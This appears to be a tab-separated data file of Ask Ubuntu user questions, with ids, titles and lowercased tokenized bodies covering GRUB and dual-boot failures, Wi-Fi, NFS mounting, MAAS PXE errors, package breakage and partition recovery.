392360	grub-install failure , and grub2 failure in general	so i asked in another topic about grub hanging in the shell . i installed ubuntu studio from a live usb , alongside windows 8.1 , but encountered this problem -- with help i was able to at least get into the new os . now the second half of the problem ( that grub is n't working in the first place ) is almost a separate issue , so i 've created a separate question and hopefully i can provide more information than at first . i got into the os as described in the answer to this question : $ linux ( hd0 , gpt8 ) /boot/vmlinuz-3.11.0-14-generic.efi.signed root=/dev/sda8 $ initrd ( hd0 , gpt8 ) /boot/initrd.img-3.11.0-14-generic $ boot once i was in , i did more research to find a solution to the overall issue , and i thought i had found it in the answer to this question : i booted into my live usb , and ran these commands , and got output as follows . ubuntu-studio @ ubuntu-studio : ~ $ mkdir tmp ubuntu-studio @ ubuntu-studio : ~ $ sudo mount /dev/sda8 /home/ubuntu-studio/tmp ubuntu-studio @ ubuntu-studio : ~ $ sudo grub-install -- root-directory=/home/ubuntu-studio/tmp /dev/sda /usr/sbin/grub-bios-setup : warning : this gpt partition label contains no bios boot partition ; embedding wo n't be possible . /usr/sbin/grub-bios-setup : warning : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/grub-bios-setup : error : will not proceed with blocklists . so , now i do n't know how to proceed . what 's the next step ?
392363	how to print longbod landscape size paper correctly in ubuntu 13.10 ?	when i want to print `` longbond '' size paper in landscape in libreoffice , printer can not print correctly ! in ubuntu 12.10 i solved this by disable cups and using only `` generic printer '' i added this line `` disablecups=true '' to this `` /etc/libreoffice/psprint.conf '' and it worked but in ubuntu 13.10 it doesnot work !
392367	ubuntu and windows 8.1 dual boot on toshiba satellite	i recently bought a toshiba satellite p50 , i tried installing ubuntu 12.04.3 and 13.10 alongside windows 8.1 . if i disable secure boot , but leave the uefi mode on , i can get to the screen that asks if i want to try ubuntu . when i select that option the screen just goes black and nothing happens . i 'm only able to load ubuntu from a usb when the secure boot and the uefi mode are both enabled . but , after i install it , the computer loads only into windows . i ran the boot-repair after from the usb , after disabling secure boot , and it told me that i should disable secure boot , but when i did i was again unable to load it from the usb . thanks for taking the time to read this . any help or suggestions with would be greatly appreciated ! !
392372	wifi keeps connecting and disconnecting instantly	i have a dell vostro 1510 laptop . there is this wifi network which i have no problem connecting to with windows os on the same laptop . but when i try connecting to it using ubuntu , wifi connects and then instantly disconnects and then tries to connect again . i do n't have access to the router of this network . is there any workaround here . also it might be worth mentioning that my android device has the same problem with that network . lspci -vvnn | grep 14e4 06:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) lshw -c network *-network description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth2 version : 01 serial : 00:1f : e2 : c6:88 : fe width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=192.168.88.107 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:19 memory : f4000000-f4003fff ls /sys/class/net/eth2/device/driver/module/drivers pci : wl sudo lshw -c network | grep driver configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=192.168.88.107 latency=0 multicast=yes wireless=ieee 802.11abg configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s any ideas ?
392376	what permissions settings will make /var/www accessible without admin ?	as a webmaster i need fast access to /var/www , what should i set in dir permissions to get rid of 'open as admin ' in order to file modification and creation ? yet i want it safe as modificable from my machine only . or is there a way to always open everything as admin ?
392379	12.04 lts not able connect to internet when installed , but could connect using livecd before installation	i met a strange problem . when i use livecd to install ubuntu 12.04 lts , i was able to connect to internet through wired connection , choosing `` try ubuntu '' . but when i installed it , it could not connect : ifconfig -a shows that eth0 does not have inet address i added : auto eth0 iface eth0 inet dhcp to interfaces , then restart networking , it says : reconfiguring network interfaces ... failed to bring up eth0 i tried to set static ip , but still no connection . i tried to delete 70-persistent , but still no connection . i tried to reinstall network driver , but still no connection . what can i do ? thanks .
392381	when i try to create a drawer in 13.10 only an empy one is created	i know drawers works fine in 12.04 , but in my 13.10 box , drag & drop does n't work anymore , only a empty entry is created in the drawer utility when i drag & drop the system settings to the drawer : any ideas ?
392382	i lost keyboard in ubuntu touch samsaung maguro . how can i fix ?	i lost keyboard in ubuntu touch samsaung maguro . how can i fix ? distributor id : ubuntu description : ubuntu trusty tahr ( development branch ) release : 14.04 codename : trusty root @ ubuntu-phablet : / # uname -a linux ubuntu-phablet 3.0.0-3-maguro # 18-ubuntu smp preempt tue oct 8 13:07:25 utc 2013 armv7l armv7l armv7l gnu/linux
392384	add a persistent progress bar to launcher icon	i 'm trying to write a script ( python ) to add a progress bar to an launcher icon . when i execute my script the icon changes , then my script exits and it changes right back . how do i change the icon in such a way the it will stay after my script exits ? # ! /usr/bin/python from gi.repository import unity , gobject launcher = unity.launcherentry.get_for_desktop_id ( `` gnome-terminal.desktop '' ) launcher.set_property ( `` progress '' , 0.5 ) launcher.set_property ( `` progress_visible '' , true ) loop = gobject.mainloop ( ) loop.run ( )
392385	installed from usb . it says `` complete '' , but after reboot still tries to install	so i am 100 % new to ubuntu and have little knowledge of what i am doing but here it goes . so i burn the latest ubuntu onto a usb then check it and everything seems fine so i go and boot off of that and then install . everything goes fine , install complete and then i reboot . every time i reboot though it just brings me right back to the grub menu and only gives me the same three options of either trying ubuntu , installing it , or check disc . i have also tried installing mint earlier and it did the same exact thing . i am also trying to install with no other os just ubuntu . if anybody knows a solution that 'd be awesome . i do n't know if it is something simple or something that i just do n't understand . thanks !
392388	how to reduce screen brightness on sony laptop using ubuntu 13.10 ?	i am a complete novice to linux and just installed ubuntu 13.10 on my sony viao e-series laptop having nvidia graphics card . for the life of me , i ca n't seem to get the screen brightness down ( the screen brightness is full right now ) . i have tried a bunch of different methods given online ( even on this website ) and have installed/downloaded a ton of material ( possibly all useless ) but nothing seems to have helped .
392390	access denied error while mounting a shared folder ?	i am a linux newbie and i have a very basic question . i have three machines - machinea 10.108.24.132 machineb 10.108.24.133 machinec 10.108.24.134 and all those machines have ubuntu 12.04 installed in it and i have root access to all those three machines . now i am supposed to do below things in my above machines - create mount point /opt/exhibitor/conf mount the directory in all servers . sudo mount < nfs-server > : /opt/exhibitor/conf /opt/exhibitor/conf/ i have already created /opt/exhibitor/conf directory in all those three machines as mentioned above . now i am trying to create a mount point on all those three machines . so i followed the below process - install nfs support files and nfs kernel server in all the above three machines $ sudo apt-get install nfs-common nfs-kernel-server create the shared directory in all the above three machines $ mkdir /opt/exhibitor/conf/ edited the /etc/exports and added the entry like this in all the above three machines - # /etc/exports : the access control list for filesystems which may be exported # to nfs clients . see exports ( 5 ) . # # example for nfsv2 and nfsv3 : # /srv/homes hostname1 ( rw , sync , no_subtree_check ) hostname2 ( ro , sync , no_subtree_check ) # # example for nfsv4 : # /srv/nfs4 gss/krb5i ( rw , sync , fsid=0 , crossmnt , no_subtree_check ) # /srv/nfs4/homes gss/krb5i ( rw , sync , no_subtree_check ) # /opt/exhibitor/conf/ 10.108.24 . * ( rw ) run exportfs in all the above three machines root @ machinea : / # exportfs -rv exportfs : /etc/exports [ 1 ] : neither 'subtree_check ' or 'no_subtree_check ' specified for export `` 10.108.24.* : /opt/exhibitor/conf/ '' . assuming default behaviour ( 'no_subtree_check ' ) . note : this default has changed since nfs-utils version 1.0.x exporting 10.108.24 . * : /opt/exhibitor/conf now i did showmount on machinea root @ machinea : / # showmount -e 10.108.24.132 export list for 10.108.24.132 : /opt/exhibitor/conf 10.108.24 . * and also i have started the nfs server like this in all the above three machines - sudo /etc/init.d/nfs-kernel-server start and now when i did this , i am getting an error - root @ machinea : / # sudo mount -t nfs 10.108.24.132 : /opt/exhibitor/conf /opt/exhibitor/conf/ mount.nfs : access denied by server while mounting 10.108.24.132 : /opt/exhibitor/conf i have also tried doing the same thing from machineb and machinec as well and still i get the same error- root @ machineb : / # sudo mount -t nfs 10.108.24.132 : /opt/exhibitor/conf /opt/exhibitor/conf/ root @ machinec : / # sudo mount -t nfs 10.108.24.132 : /opt/exhibitor/conf /opt/exhibitor/conf/ did my /etc/exports file looks good ? as i have the same content in all the three machines . and also are there any logs related to nfs which i can see to find any clues ? any idea what wrong i am doing here ? update : - so my etc/exports files would be like this in all the three machines - # /etc/exports : the access control list for filesystems which may be exported # to nfs clients . see exports ( 5 ) . # # example for nfsv2 and nfsv3 : # /srv/homes hostname1 ( rw , sync , no_subtree_check ) hostname2 ( ro , sync , no_subtree_check ) # # example for nfsv4 : # /srv/nfs4 gss/krb5i ( rw , sync , fsid=0 , crossmnt , no_subtree_check ) # /srv/nfs4/homes gss/krb5i ( rw , sync , no_subtree_check ) # /opt/exhibitor/conf/ 10.108.24.132 ( rw ) /opt/exhibitor/conf/ 10.108.24.133 ( rw ) /opt/exhibitor/conf/ 10.108.24.134 ( rw ) just a quick check - the ip address that i am taking for each machine as mentioned above is like this - root @ machineb : / # ifconfig eth0 link encap : ethernet hwaddr 00:50:56 : ad:5b : a7 inet addr:10.108.24.133 bcast:10.108.27.255 mask:255.255.252.0 up broadcast running multicast mtu:1500 metric:1 rx packets:5696812 errors:0 dropped:12462 overruns:0 frame:0 tx packets:5083427 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7904369145 ( 7.9 gb ) tx bytes:601844910 ( 601.8 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:16436 metric:1 rx packets:187144 errors:0 dropped:0 overruns:0 frame:0 tx packets:187144 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:24012302 ( 24.0 mb ) tx bytes:24012302 ( 24.0 mb ) here the ip address that i am taking for machineb is 10.108.24.133 .
392396	installing ubuntu server from usb installs to wrong location ?	i 'm trying to install ubuntu server 12.04 from a usb and i 've gotten my iso file and created the installer on the usb using universal usb installer . i then start my laptop , booting from the usb and the installer runs but in the end it seems to install to the flash drive . during the installation i select my normal hard drive as the location to write to but it wo n't boot without the flash drive still in . any ideas ? edit : i believe my problem might be coming from an instruction during the install that asks if grub should be installed to the master boot record , and refers to it as `` install the grub boot loader to the master boot record of your first hard drive '' right now in my bios , the flash drive is listed as the first hard drive which is the only way i could get it to boot into the install . i could try installing by cd .
392397	owncloud client does not update in 12.04 , asks for partial update	trying to update with sudo apt-get update & & sudo apt-get install libocsync-dev libocsync-plugin-owncloud libocsync0 i get the following : libocsync-plugin-owncloud : depends : libocsync0 ( = 0.90.4-0 ) but 0.91.4 is to be installed any idea how to solve that ? i have to stick to 12.04 .
392398	i need help adding a script to /etc/rc.local	this seems simple but i ca n't seem to figure it out . i am trying to write a script to mount a drive on startup . the command i want to run is : google-drive-ocamlfuse ~/gdrive but i want it to run each time i start the computer up . i have tried to write a script and ca n't seem to figure it out . help would be much appreciated . thanks in advance
392399	how to start custom applications as root automatically on boot ?	i have made a sound based installation using openframeworks and puredata that runs on ubuntu 12.10 . i need the installation to run continuously for days together . when the power goes off , i need the apps to start automatically on reboot . my problem is , i have got everything installed in the root account because that is how few of them would run . so i need the system to run those programs as root without asking for a password . somehow it sounds very silly to me but i guess there must be a way to do this . any help/pointers are appreciated . thank you
392400	pny 32gb flash drive not working after transferring files ?	i just bought a brand new 32gb flash drive ( pny ) and i formatted a fat file system as i wanted to use on both my ubuntu and windows machines . it was working properly after transferring data from a windows 7 machine and then transferring data from my ubuntu machine . after doing so it does not recognize on either . i 'm running 12.04 , any suggestions ? other than broken , crappy flash drive ?
392403	how to make bootable usb file of win7.nrg in ubuntu ?	i have image of windows 7 ultimate in my laptop and i burned it into dvd but now it 's currupted and i ca n't use the media . and i want to learn how to make usb bootable disk of win7.nrg into my pen drive . i tried diskpart but it was useless . so please suggest me or help me how can i make it in ubuntu ... i 'll be thankfull .
392407	how can i create unity launch icon for chrome evernote ?	i use evernote web app and i would like to use it separated from other chrome tabs , as autonom web app . this is possible when i choose `` open as window '' option in evernote web settings . but i would like to have this icon in unity launcher . with custom name , icon and link ( which should open new chrome window with evernote app in it ) .
392408	force load fglrx / emulate display	i want a headless machine ( no display attached ) for opencl calculation but fglrx drivers wo n't fully load until i attach a display to the vga card . the vga ( r9 290 ) does n't have dac ( there are dp , hdmi , dvi-d , but no dvi-i or d-sub ) , so the `` dummy plug '' wo n't work . any ideas about how to forcefully load the drivers ( so that they can do both opencl calculations and be tuned via adl ) , disable this os/driver behavior ( energy saving and/or system stability concerns ) , or fake a display ( make the gpu work to an emulated frambuffer or something which can act like a real display ) ?
392411	touchpad issues ?	i am kind of new to ubuntu , and i love using it , but i hate the touchpad sensitivity in it . my touchpad works fine on windwos , but in ubuntu its very hard to work with . it closes tabs without tapping and paste text while i am scrolling a text file , its just crazy and driving me crazy . i have tried to install gpointing device settings to control the sensitivity and the tapping , but it did n't make any difference . i ended up disabling the tapping , but i can not get used to this . i also tried to control it through changing the values by xinput -- set-prop , but it disabled my touchpad . there must be another solution for this ! how to solve this ?
392412	mount my webserver as a drive in win7/8	for a variety of reasons i still have a couple of windows machines around ( ver 7 and 8.1 ) . they are still my primary machines . however , i 've been running a couple of ubuntu 12.04 desktops for a while now ( 9.04 before 12.04 ) . they are my primary dev machines and they are on my lan . i also have a few ubuntu 12.04 server machines serving webpages ( wan ) . one is my primary web server while the others house backups and db info that has gotten large enough to require it 's own server so the server serving webpages does n't get bogged down . long story short , i still spend most of my time in front of my windows machines even when doing dev for my ubuntu machines . i grew up coding in crimson editor and still prefer it for my coding in php ( and occasionally ruby ) . ( i know there are probably 20 better coding guis out there that if i just took the time to learn ... suggestions are welcome . ) right now i 'd like to move my dev work to an underutilized wan server . crimson editor will open files via ftp but it is a pain for several reason . ideally i 'd be able to map my wan ubuntu server 's web directory to a drive letter on my windows machines . then i could use file explorer , drag & drop , etc . natively in windows without all the slow down and pita of going through crimson 's ftp functionality . my research to date suggested there were programs for doing this with win 7 and ubuntu 10.10 but that they were a little flacky - i.e . dropped and corrupted info . obviously having my code dropped or corrupted in transit is less than ideal . is there a way to do this reliably ? if so , what are security concerns ? i have iptables setup but the ip address of my home connection is dynamic not static . so i 'd prefer to not have to deal with that . thanks
392416	ssh not working on my remote server	connection issue on my server , i connect server to my local but not connect error on file browser popup `` ssh program unexpectedly exited '' . i am trying to via terminal its working fine but not working to via file browser hope you understand go to file > connect to server > i enter server ip address , user , password but not any output . same error popup as i define above . thanks in advanced .
392417	does ubuntu support the so-called fusion system ?	i was wondering if ubuntu does support the so-called fusion gpu system - which uses integrated one to save power all the time , and switches to discrete one only when you need it .
392423	changes not reflecting back to the browser . editing files remotely through ftp . ubuntu server .	i am developing and editing files through ftp . the changes are not reflecting back on the browser . i have cleared cache on the browser using key combination but still the changes are not reflected . i was wondering if there 's a configuration i have to tackle at the remote server itself . like clear memory cache or something . can you guys help me ? i am 10 hour coding and i am not getting anywhere . thanks .
392424	high memeory usage on 12.04	system : ubuntu 12.04.3 lts ( gnu/linux 3.8.0-34-generic x86_64 ) i am using webmin to see the system since i am not a linux expert . since last week there is an unusual memory usage in my system . is this normal ? also here is my htop output & vmstat 2 10 please let me know if you need any more information to track this . out put of ps axu | awk ' { print $ 2 , $ 3 , $ 4 , $ 11 } ' | head -1 & & ps axu | awk ' { print $ 2 , $ 3 , $ 4 , $ 11 } ' | sort -k3 -nr |head -5 7165 0.0 7.8 /usr/sbin/mysqld 30041 0.8 1.5 /usr/sbin/apache2 30038 0.5 1.5 /usr/sbin/apache2 30043 0.2 1.4 /usr/sbin/apache2 30003 0.0 1.4 /usr/sbin/apache2
392425	wireless download speed fluxuating 13.10	hey so i just installed ubuntu desktop ( 64-bit ) on my toshiba satellite and have run into no problems minus the wireless speeds going up and down dramatically . snapshot of system monitor : i 'll post anything else you need to solve this ! just ask
392428	unable to update ubuntu 12.04	could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/dl.google.com_linux_earth_deb_dists_stable_main_i18n_translation-pt % 5fbr , e : as listas de pacotes ou o ficheiro de status n茫o p么de ser analisado ou aberto .
392429	maas pxe wont go further than config	this keeps looping in logfiles ( while the client tries to retrieve config via pxelinux.cfg/macaddr ) 2013-12-18 07:47:58+0100 [ tftp ( udp ) ] datagram received from ( '172.27.0.85 ' , 49153 ) : < rrqdatagram ( filename=pxelinux.cfg/01-00-22-15-fe-87-56 , mode=octet , options= { 'tsize ' : '0 ' , 'blksize ' : '1408 ' } ) > 2013-12-18 07:47:58+0100 [ tftp ( udp ) ] datagram received from ( '172.27.0.85 ' , 49153 ) : < rrqdatagram ( filename=pxelinux.cfg/01-00-22-15-fe-87-56 , mode=octet , options= { 'tsize ' : '0 ' , 'blksize ' : '1408 ' } ) > 2013-12-18 07:47:58+0100 [ - ] starting factory < httpclientfactory : http : //localhost/maas/api/1.0/pxeconfig/ ? cluster_uuid=a55392ec-6531-4c86-b647-1193b589c67d & local=172.27.0.80 & mac=00-22-15-fe-87-56 & remote=172.27.0.85 > 2013-12-18 07:47:58+0100 [ - ] starting factory < httpclientfactory : http : //localhost/maas/api/1.0/pxeconfig/ ? cluster_uuid=a55392ec-6531-4c86-b647-1193b589c67d & local=172.27.0.80 & mac=00-22-15-fe-87-56 & remote=172.27.0.85 > 2013-12-18 07:47:58+0100 [ httppagegetter , client ] unhandled error in deferred : 2013-12-18 07:47:58+0100 [ httppagegetter , client ] unhandled error traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 380 , in callback self._startruncallbacks ( result ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 488 , in _startruncallbacks self._runcallbacks ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 575 , in _runcallbacks current.result = callback ( current.result , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1126 , in gotresult _inlinecallbacks ( r , g , deferred ) -- - < exception caught here > -- - file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1068 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 389 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/tftp/protocol.py '' , line 67 , in _startsession context , self.backend.get_reader , datagram.filename ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 575 , in _runcallbacks current.result = callback ( current.result , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/tftp.py '' , line 173 , in generate_config kernel_params=kernel_params , **params ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/pxe/config.py '' , line 113 , in render_pxe_config return template.substitute ( namespace ) file `` /usr/lib/python2.7/dist-packages/tempita/__init__.py '' , line 173 , in substitute result , defs , inherit = self._interpret ( ns ) file `` /usr/lib/python2.7/dist-packages/tempita/__init__.py '' , line 184 , in _interpret self._interpret_codes ( self._parsed , ns , out=parts , defs=defs ) file `` /usr/lib/python2.7/dist-packages/tempita/__init__.py '' , line 212 , in _interpret_codes self._interpret_code ( item , ns , out , defs ) file `` /usr/lib/python2.7/dist-packages/tempita/__init__.py '' , line 235 , in _interpret_code base = func ( base ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/pxe/config.py '' , line 105 , in kernel_command return compose_kernel_command_line ( params ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/kernel_opts.py '' , line 185 , in compose_kernel_command_line options += compose_purpose_opts ( params ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/kernel_opts.py '' , line 138 , in compose_purpose_opts get_ephemeral_name ( params.release , params.arch ) ) file `` /usr/lib/python2.7/dist-packages/provisioningserver/kernel_opts.py '' , line 110 , in get_ephemeral_name `` 'maas-import-pxe-files ' . '' % root ) provisioningserver.kernel_opts.ephemeralimagesdirectorynotfound : the directory containing the ephemeral images/info is missing ( u'/var/lib/maas/ephemeral/saucy/ephemeral/amd64 ' ) . make sure to run the script 'maas-import-pxe-files ' . 2013-12-18 07:47:58+0100 [ httppagegetter , client ] stopping factory < httpclientfactory : http : //localhost/maas/api/1.0/pxeconfig/ ? cluster_uuid=a55392ec-6531-4c86-b647-1193b589c67d & local=172.27.0.80 & mac=00-22-15-fe-87-56 & remote=172.27.0.85 > 2013-12-18 07:47:58+0100 [ httppagegetter , client ] stopping factory < httpclientfactory : http : //localhost/maas/api/1.0/pxeconfig/ ? cluster_uuid=a55392ec-6531-4c86-b647-1193b589c67d & local=172.27.0.80 & mac=00-22-15-fe-87-56 & remote=172.27.0.85 > 2013-12-18 07:47:58+0100 [ httppagegetter , client ] logged oops id oops-a073216bd851b2c1a4b518006374f485 : no exception type : no exception value 2013-12-18 07:47:58+0100 [ httppagegetter , client ] logged oops id oops-37d7052e3bc6e8ba0a499c8bb734609c : ephemeralimagesdirectorynotfound : the directory containing the ephemeral images/info is missing ( u'/var/lib/maas/ephemeral/saucy/ephemeral/amd64 ' ) . make sure to run the script 'maas-import-pxe-files ' . yeah , so ... i checked if /var/lib/maas/ephemeral/saucy/ephemeral/amd64 existed . and no , the only thing that exists is : # find /var/lib/maas/ephemeral /var/lib/maas/ephemeral /var/lib/maas/ephemeral/tgt.conf /var/lib/maas/ephemeral/.simplestreams /var/lib/maas/ephemeral/.simplestreams/quantal /var/lib/maas/ephemeral/.simplestreams/quantal/release-20131013 /var/lib/maas/ephemeral/tgt.conf.d and , i 've run `` maas-import-pxe-files '' ten times now ; - ) what gives ?
392430	how to recover a deleted ext4 partition	i had a 1tb hdd partitioned as follows 2 primary partitions 100mb created by windows7 and a 50gb i used as my c drive ( which contained my win7 os ) remaining full an extended partition that extended is divided into 100 gb - ntfs 250 gb - ext4 ~580gb ( approx ) - ext4 ~17gb ( approx ) - ext4 ubuntu was installed in this partition ( no swap ) i have done the most stupid thing , deleted the 2 primary partition to update to windows 8 obviously i lost my extended partition which now shows as un allocated space . the strange thing is that my ubuntu installation was intact i could boot into it . i ran test disk it was able to detect 100gb and 580gb partitions ; but failed to detect the 250 gb partition which is the most important one for me . ran a deeper search . detected all the partitions but there was double entry for some partitions changed to 250gb partition to primary in testdisk to recover it . but it fails to mount now . at this point i have made a copy of the whole hdd with ddrescue . tried e2fsck on that 250gb partition shown a lot of errors , after repairing mounted it . there was nothing in that partition except the lost+found folder ; but the drive properties shows ~70gb occupied ( in fact i had data almost to full ) . can some one help me to recover it ? it 's much important to me
392431	syncevolution ( syncevo-dbus-server ) autostart in 13.10	as stated in this bug , there are 2 files missing in 13.04 and in 13.10 : /usr/lib/syncevolution/syncevo-dbus-server-startup.sh /etc/xdg/autostart/syncevo-dbus-server.desktop because of what syncevo autostart does not work . is there any way to fix this problem ?
392434	apt-get moodle error 1045	when in ubuntu and i try to install a program not related to moodle i get an error message that refers to moodle processing errors : # apt-get install screen reading package lists ... done building dependency tree reading state information ... done screen is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 162 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up moodle ( 1.9.9.dfsg2-3 ) ... dbconfig-common : writing config to /etc/dbconfig-common/moodle.conf error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) . unable to connect to mysql server . error encountered creating user : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) dpkg : error processing moodle ( -- configure ) : subprocess installed post-installation script returned error exit status 10 no apport report written because maxreports is reached already errors were encountered while processing : moodle e : sub-process /usr/bin/dpkg returned an error code ( 1 ) why does this happen and how can install software without this error / reference to moodle ? i tried apt-get removing moodle root @ bnserver : /var/crash # sudo apt-get remove moodle reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : moodle 0 upgraded , 0 newly installed , 1 to remove and 162 not upgraded . 1 not fully installed or removed . after this operation , 53.8 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 184717 files and directories currently installed . ) removing moodle ... dpkg : error processing moodle ( -- remove ) : subprocess installed pre-removal script returned error exit status 10 no apport report written because maxreports is reached already dbconfig-common : flushing administrative password dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 10 errors were encountered while processing : moodle e : sub-process /usr/bin/dpkg returned an error code ( 1 )
392438	mysql job failed to start	i got an error while am up starting the mysql service . /etc/init.d/mysql start rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service mysql start since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start mysql start : job failed to start kindly share your ideas ...
392439	ethernet not working on 13.10	i 'm new to ubuntu and just install 13.10 , all seems to be working however , i can not connect to the internet , i have no wireless card and with the ethernet cable in , it looks as if it is searching for a wireless connection and will not connect . anyone got any solutions ?
392446	motherboard bios version via command line	i want to know the bios version of my motherboard ... the command dmidecode give you some info about the bios but i ca n't find what i need ... so anybody can help ? ! i tried dmidecode command before asking and i did n't find what i need - i want only the bios-version and nothing else in the output
392448	conflict with flash when mozilla when google chrome/chromium is installed	i have 12.04 installed on my laptop . i noticed after installing chromium and eventually google-chrome ( stable ) that the flash player for either browser was not working properly . when trying to exit from full screen while using google chrome the entire screen would go gray and the only solution would be to shut off the computer . do the two versions of flash conflict with each other to produce the `` gray '' screen ?
392452	modern opengl core development on an optimus laptop using 13.10 ?	i want to do some ( modern , core ) opengl programming , and the highest i have available currently on my haswell architecture ( i7 ) is 2.1 via mesa . after doing some digging , it looks like this is the highest version supported by the gallium3d driver . i 've tried using bumblebee , but the farthest i got with it was just some major x-org issues . what i 'd like is to at least be able write with a 3.3 core profile . is this feasible , given my current situation ?
392457	is there a way to force format write protected pendrive	my usb is a sandisk cruzer 8 gb drive with usb 2.0 . it says it 's write protected when i try to format it . is there a way to force format it ? i try 'd some of this ways : varun @ varun-pc ~ $ sudo fdisk -l [ sudo ] password for varun : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x616d49a5 device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 204799999 102040576 7 hpfs/ntfs/exfat /dev/sda3 204800000 567169023 181184512 7 hpfs/ntfs/exfat /dev/sda4 567174886 976768064 204796589+ f w95 ext 'd ( lba ) partition 4 does not start on physical sector boundary . /dev/sda5 567174888 575753534 4289323+ 82 linux swap / solaris /dev/sda6 630197883 976768064 173285091 7 hpfs/ntfs/exfat partition 6 does not start on physical sector boundary . /dev/sda7 575754240 630196223 27220992 83 linux partition table entries are not in disk order disk /dev/sdb : 8004 mb , 8004304896 bytes 19 heads , 5 sectors/track , 164562 cylinders , total 15633408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000570f2 device boot start end blocks id system /dev/sdb1 * 2048 15632383 7815168 7 hpfs/ntfs/exfat varun @ varun-pc ~ $ umount /dev/adb1 umount : /dev/adb1 is not mounted ( according to mtab ) varun @ varun-pc ~ $ sudo fsck.vfat -f -p /dev/sdb1 dosfsck 3.0.13 , 30 jun 2012 , fat32 , lfn currently , only 1 or 2 fats are supported , not 0. varun @ varun-pc ~ $ sudo fsck.vfat -f -v /dev/sdb1 dosfsck 3.0.13 ( 30 jun 2012 ) dosfsck 3.0.13 , 30 jun 2012 , fat32 , lfn currently , only 1 or 2 fats are supported , not 0 .
392458	scilab not getting installed on ubuntu 13.10	i have recently installed ubuntu 13.10 and scilab is not getting installed on my pc & the reason for scilab not getting installed is shown as error details are shown below . failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/universe/o/opencv/libopencv-video2.4_2.4.5+dfsg-0ubuntu4_amd64.deb size mismatch how to fix this ?
392462	ubuntu 12.04 lts/13.04 fails to install	i tried to install 12.04 lts and 13.04 ( 32 bit and 64 bit ) iso but both fails . my hardware configuration is here summary config : intel i3 , amd radeon hd 6370m 2gb , 8gb ram . steps to reproduce : i checkd the iso md5 checksum and it was ok. insert the dvd , it began to load choose language menu appears and choose to install ( also tried live ) image apears that ubuntu is loading computer restarted i tried to change the boot mode with acpi = off and nolapic set but the same . finally i have done with it installing 10.04 and upgrade to 12.04 lts but it took so long . i think there is a problem with videocard drivers . i 'm not sure . please advice me , i want a clean install without upgrading from a lower version . how to solve this ?
392464	disable workspace switching when openning a new application file/instance	i 'm new to linux so i do n't really know how to do it . i 've been browsing for a solution but found nothing that would accomplish this goal . what i want is : when i open an already opened application i want that application to stay in the same workspace as it was the first time i opened it . imagine the following ceneraio : workspace 1 has sublimetext opened workspace 2 has thunar opened in workspace 2 i open a .java file with sublimetext what happens is that sublimetext is now on workspace 2 and not on workspace 1 anymore . if possible i would not like to use devilspie or compizconfig . how do i prevent this from happening ? thanks in advance .
392465	total newb . grub install error	i am continuously getting the error when installing ubuntu that i see others getting as well . as i have never used linux before and i have no clue what i 'm doing . i have tried again and again following tutorials and looking at forums but at 4 in the morning i officially given up . i would really really appreciate any help i 'm at a dead end .
